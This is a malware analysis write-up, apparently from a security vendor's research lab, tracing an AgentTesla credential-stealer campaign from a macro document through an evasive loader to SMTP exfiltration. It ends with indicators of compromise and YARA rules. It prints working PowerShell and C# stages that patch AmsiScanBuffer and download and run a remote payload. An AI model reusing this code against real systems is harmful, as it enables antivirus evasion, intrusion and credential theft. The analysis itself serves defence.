Commodity Malware Reborn: The AgentTesla “Total Oil” themed Campaign

Introduction

Nowadays, Malware-as-a-Service is one of the criminals' favorite ways to breach a security perimeter. Agent Tesla is one of these "commodity malware" families: it is a fully customizable password info-stealer, and many cyber criminals are choosing it as their preferred reconnaissance tool.

During our monitoring operations we discovered an infection chain designed to deliver this kind of malware to some Italian companies. The attack was carried out by impersonating personnel from the Liberian division of a global oil corporation. The malicious email messages were spoofed, but the reference to the employee was realistic and suggests the attacker may have conducted some preliminary OSINT.

Technical Analysis

Hash: 72087f6eda897bd3deb31fa85cfbeda8eae4bad0d51a123f3e99ae8fb604a8c0
Threat: Macro Dropper
Brief Description: Agent Tesla Doc Macro Dropper
Ssdeep: 768:nI5p+fXDk6n/lj9uJUWbnyAik8Y61g187083VCP9V9eakw6L8:8p+fzP/bgfix28ly9VZH6L8

Table 1. Static information about the doc macro

The document uses a common phishing scheme: it invites the user to enable macro execution, citing compatibility reasons with older Microsoft Office versions. The document contains an obfuscated VBA macro.

Figure 1: Screen of the fake document

Figure 2: Piece of the malicious macro

Despite the variable names and the altered code flow, the macro simply decodes its hidden payload and then executes it. In fact, after a series of text replacements, the document spawns a PowerShell script.

powershell -WindowStyle Hidden
# XOR decoder: the hex string is turned into bytes, each XORed with the repeating key "bc9b4"
function b72f3 {
    param($l74b5)
    $l557ad = 'bc9b4'; $l63acc = '';
    for ($i = 0; $i -lt $l74b5.length; $i += 2) {
        $f3ed5fa = [convert]::ToByte($l74b5.Substring($i, 2), 16);
        $l63acc += [char]($f3ed5fa -bxor $l557ad[($i / 2) % $l557ad.length]);
    }
    return $l63acc;
}
# The decoded string is C# source code, compiled in-process by Add-Type and then invoked
$k61b35e = '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'; $k61b35e2 = b72f3($k61b35e);
Add-Type -TypeDefinition $k61b35e2; [p99a3fb]::o81f67();

Code Snippet 1

The PowerShell stage is essentially composed of three parts: the first is the declaration of the function "b72f3()", whose purpose is to deobfuscate the second part of the script, contained in the "$k61b35e" variable. That part is actually a C# source code snippet, compiled and loaded within the PowerShell process at execution time. Once loaded, the third part of the script invokes the "o81f67()" method of the just-compiled "p99a3fb" class.

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using System.Net;

public class p99a3fb {
    // Win32 imports hidden behind random names: GetProcAddress, LoadLibrary,
    // VirtualProtect and RtlMoveMemory
    [DllImport("kernel32", EntryPoint = "GetProcAddress")]
    public static extern IntPtr va46a7(IntPtr af474b5, string a2457);
    [DllImport("kernel32", EntryPoint = "LoadLibrary")]
    public static extern IntPtr ud1451(string j4d4b5);
    [DllImport("kernel32", EntryPoint = "VirtualProtect")]
    public static extern bool m9982c8(IntPtr sfff854, UIntPtr j5236a, uint r427a, out uint m8a94);
    [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
    static extern void jcfb22(IntPtr mf1b8, IntPtr dcad15, int k456b);

    public static int o81f67() {
        // Load the library whose name is XOR-decoded at run time (decodes to "amsi.dll")
        IntPtr eef257 = ud1451(b72f3("030e4a0b1a060f55"));
        if (eef257 == IntPtr.Zero) { goto l255c; }
        // Resolve the exported function (decodes to "AmsiScanBuffer")
        IntPtr bca6aa = va46a7(eef257, b72f3("230e4a0b67010257204104055c10"));
        if (bca6aa == IntPtr.Zero) { goto l255c; }
        // Make the function's memory writable (0x40 = PAGE_EXECUTE_READWRITE)
        UIntPtr de6f3 = (UIntPtr)5;
        uint d5c61 = 0;
        if (!m9982c8(bca6aa, de6f3, 0x40, out d5c61)) { goto l255c; }
        // Overwrite three bytes at offset 0x1b of the function; any failure
        // above skips this step and falls through to the download
        Byte[] e197fb8 = { 0x31, 0xff, 0x90 };
        IntPtr kee39a = Marshal.AllocHGlobal(3);
        Marshal.Copy(e197fb8, 0, kee39a, 3);
        jcfb22(new IntPtr(bca6aa.ToInt64() + 0x001b), kee39a, 3);
    l255c:
        // Download the next stage to %APPDATA%\x3a81a + ".exe" (extension decoded) and run it
        WebClient rd1389 = new WebClient();
        string ybea79 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\x3a81a" + b72f3("4c064107");
        rd1389.DownloadFile(b72f3("0a174d120e4d4c4e15434c0b580c5010164a0a1a010c544d43124e5a0d5a160657161b120f4c055d0c1016035f0b105407404d15500743114c7d1746250b580f640d1317074c07"), ybea79);
        ProcessStartInfo n52cefe = new ProcessStartInfo(ybea79);
        Process.Start(n52cefe);
        return 0;
    }

    // Same XOR decoder as the PowerShell b72f3(), with the same key "bc9b4"
    public static string b72f3(string s1f74a) {
        string af474b5 = "bc9b4";
        string ud1451 = String.Empty;
        for (int i = 0; i < s1f74a.Length; i += 2) {
            byte va46a7 = Convert.ToByte(s1f74a.Substring(i, 2), 16);
            ud1451 += (char)(va46a7 ^ af474b5[(i / 2) % af474b5.Length]);
        }
        return ud1451;
    }
}

Code Snippet 2

Code Snippet 2 is the C# class to be loaded. Its objective is to download the payload from the drop URL, previously decoded by the "b72f3()" function: "hxxp://www.handrush[.com/wp-content/plugins/akismet/views/DurGhamPop[.exe"

The payload is stored in the "%APPDATA%\Roaming" path and is immediately executed through the "Process.Start()" function.
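The XOR decoder shared by Code Snippet 1 and Code Snippet 2 is simple enough to re-implement for triage. The following is an added example, not code from the original post or from the sample: a Python port of "b72f3()" run over the hex strings embedded in Code Snippet 2, so that the library name, the function name, the file extension and the drop URL can be recovered offline without executing anything (the drop URL is returned defanged in the post's own IoC style).

```python
# Added example (not from the original post): a re-implementation of the
# sample's b72f3() XOR string decoder, applied to the hex blobs that appear
# in Code Snippet 2, so the strings it hides can be recovered offline.

KEY = b"bc9b4"  # key used by both the PowerShell and the C# b72f3()

# Hex strings exactly as they appear in the C# class (Code Snippet 2)
ENCODED = {
    "library": "030e4a0b1a060f55",
    "function": "230e4a0b67010257204104055c10",
    "extension": "4c064107",
    "drop_url": ("0a174d120e4d4c4e15434c0b580c5010164a0a1a010c544d43124e5a0d5a"
                 "160657161b120f4c055d0c1016035f0b105407404d15500743114c7d1746"
                 "250b580f640d1317074c07"),
}


def b72f3(hex_text: str, key: bytes = KEY) -> str:
    """Decode a hex string: byte i is XORed with key[i % len(key)]."""
    if len(hex_text) % 2:
        raise ValueError("odd-length hex string")
    data = bytes.fromhex(hex_text)
    return "".join(chr(b ^ key[i % len(key)]) for i, b in enumerate(data))


def defang(s: str) -> str:
    """Neutralise a URL for reporting, in the style used by the post's IoCs."""
    return s.replace("http", "hxxp").replace(".", "[.]")


def decode_sample_strings() -> dict:
    """Decode every embedded string; the drop URL is returned defanged."""
    out = {name: b72f3(hexs) for name, hexs in ENCODED.items()}
    out["drop_url"] = defang(out["drop_url"])
    return out


if __name__ == "__main__":
    for name, value in decode_sample_strings().items():
        print(f"{name:10} {value}")
```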

The Loader

Hash: 51a95607ab767b8b70479bdb86cc0a20b53eda92cd11f3abbe9eda5616a50a97
Threat: Agent Tesla Loader
Brief Description: Agent Tesla .NET C# loader
Ssdeep: 12288:8OQeYYBAkiEK/jfG3JI0YXvL7VIUMbHdX9WBRktIx4urElCccP:8cYCdiEK/jGXqLhqNQAICurrccP

Table 2. Static information about the AgentTesla evasive loader

The dropped payload is a .NET executable embedding some anti-analysis tricks. If it is executed in a virtual environment, the malware kills itself. It also uses some anti-debugging tricks to decide whether to terminate its execution.

Figure 3: Method after which the process kills itself

According to the MSDN documentation, the method Delegate.CreateDelegate "creates a delegate of the specified type that represents the specified static method of the specified class, with the specified case-sensitivity and the specified behavior on failure to bind". This way, the control flow is switched to the delegated method, which actually points to a DLL containing the anti-analysis logic.

Figure 4: Loading routine of the internal DLL

Before passing control to the "swety.dll" library, a sort of helper component with no particular purpose other than identifying analysis environments, the first instructions executed here decode and load a byte array embedded inside the executable, unpacking the obfuscated code.

Figure 5: Decoding routine of the DLL

The figure above shows how this payload is encoded within the byte array and the routine invoked to retrieve it. The byte array is actually a well-formed DLL loaded through the "Thread.GetDomain().Load()" method. At this point, control finally passes to the "swety.dll" library, the module in charge of detecting the analysis environment.

The “Swety” Module

Hash: a0c9472bc1660be648adce938d5447d38ba6d6f166d18d9e9b4ec4dd74c315c0
Threat: Swety evasion module
Brief Description: .NET Swety evasion module
Ssdeep: 1536:fKTxXyAZ0ngmxSHOKQZfRWC/BiwGJ/827Lwv9kAdhUkIahRm48GSL/bq0g+9R26:fKpXGxxdZfE37+9pdhjTm2k/bmQ26

Table 3. Static information about the “swety” evasive module

This component is also a .NET executable. The class names are self-explanatory: for instance, there are clear references to Virtual Machine detection logic.

Figure 6: Example of the enumeration of the Hypervisors

In Figure 9, the malware retrieves information about the current hardware and compares it with a defined set of criteria; when it finds a match, it kills itself. Otherwise, the DLL continues its execution and loads another PE file hidden inside the initial loader. This last executable runs as a new thread within the initial loader's context.

Figure 7: Loading of the AgentTesla final payload

The Payload 

Hash: 82213cd55fee5374e407b4b98c45d7b0d291682ec0fd91b3ea47c32752b54ab9
Threat: Agent Tesla
Brief Description: Agent Tesla Payload
Ssdeep: 6144:Ci+WZ3skyQgBYnQ7oEFjaRJ8d8ZxjD1N/a66Gq3ovDuItbP7:CbGyH5ZjaRedapNT6

Table 4. Static information about the AgentTesla payload

The extracted payload is a .NET binary. AgentTesla and Hawkeye share lots of code, and the analysis we made two months ago of the Hawkeye payload is similar to this one.

Figure 8: Recurrent string decryption routine through the usage of Rijndael algorithm

Also in this case, every piece of sensitive information, strings included, is encrypted with the Rijndael algorithm, and the payload tries to evade sandboxes by checking the current user name against the user names commonly used by the principal sandboxes. The persistence mechanism is practically the same, and the installation path detected during the analysis is "%APPDATA%/Roaming/SecondLORI/SecondLORI.exe"

Figure 9: Sandbox evasion trick

Figure 10: Persistence mechanism

After its installation, the malware starts to retrieve all the credentials stored within a wide list of web browsers, FTP clients, file downloaders, etc. For instance, it is able to steal accounts from:

  • Google Chrome
  • Yandex
  • Comodo Dragon
  • Cool Novo
  • Chromium
  • Torch Browser
  • 7Star
  • Amigo
  • Brave
  • Cent Browser
  • Chedot
  • Coccoc
  • Elements Browser
  • Epic Privacy
  • Kometa
  • Orbitum
  • Sputnik
  • Uran
  • Vivaldi
  • UC Browser
  • Flock Browser
  • CoreFTP
  • FileZilla
  • JDownloader
  • QQBrowser
  • Outlook
  • SeaMonkey
  • Thunderbird

The harvested credentials are then sent back to the attacker's servers. The malware leverages the .NET API to easily set up a mail client that transmits the loot to a particular mailbox.

Figure 11: SMTP client account configuration

The sender name, "Lori", matches the name used in the persistence mechanism, "SecondLORI". This username may belong to a previously compromised email account that the attacker uses as a sort of SMTP relay to deliver the loot to the real exfiltration address, a Gmail mailbox named "chevyview450@gmail.com".

Figure 12: SMTP communication

Conclusion

As we stated in the previous post about a custom weaponization of the Hawkeye info-stealer, these kinds of malware are well known and heavily used by cyber criminals. But despite their popularity, even within the info-sec community, these "commodity tools" still prove quite effective, especially when combined within custom multi-stage infection chains, renewing their dangerousness and effectiveness.

Indicators of Compromise

Hashes

  • 6b3bec68b760ac3f3f1b8a4668ac4bccde262ecdf1dc93a5329fa58eefdfb47b
  • 51a95607ab767b8b70479bdb86cc0a20b53eda92cd11f3abbe9eda5616a50a97
  • a0c9472bc1660be648adce938d5447d38ba6d6f166d18d9e9b4ec4dd74c315c0

DropUrl:

  • hxxp://www.handrush[.com/wp-content/plugins/akismet/views/DurGhamPop[.exe

C2 (smtp)

  • chevyview[@gmail[.com

Persistence Mechanism

  • Setting of the registry key “HKCU\Software\Microsoft\Windows\CurrentVersion\Run”

Yara Rules

// the "pe" module must be imported because the loader rule uses pe.timestamp
import "pe"

rule AgentTesla_MacroDropper_1909 {
    meta:
      description = "Yara rule for AgentTesla Macro DOC Dropper 1909"
      author = "Yoroi - ZLab"
      last_updated = "2019-09-17"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {70 6D EF 0D 0F 32 2A A4 A0 8D 0A}
      $a2 = {7B D6 CB 41 C7 28 48 4D ED A5}
      $a3 = {5F AF B6 16 6C A9 3A 0C 5F D8 5C}
    condition:
      uint16(0) == 0x4B50 and all of them
}

rule AgentTesla_loader_1909 {
    meta:
      description = "Yara rule for AgentTesla loader 1909"
      author = "Yoroi - ZLab"
      last_updated = "2019-09-17"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {3D D2 5B 5B 7B 9B EF 4C BB}
      $a2 = {8E AF 2D D0 BD 78 5C D1 15}
      $a3 = "F7yYSv5wCAK/4YCGT+bQ==" ascii wide
    condition:
      uint16(0) == 0x5A4D and pe.timestamp == 0x25E8088E and all of them
}

This article was authored by Luigi Martire and Luca Mella of Cybaze-Yoroi Z-LAB.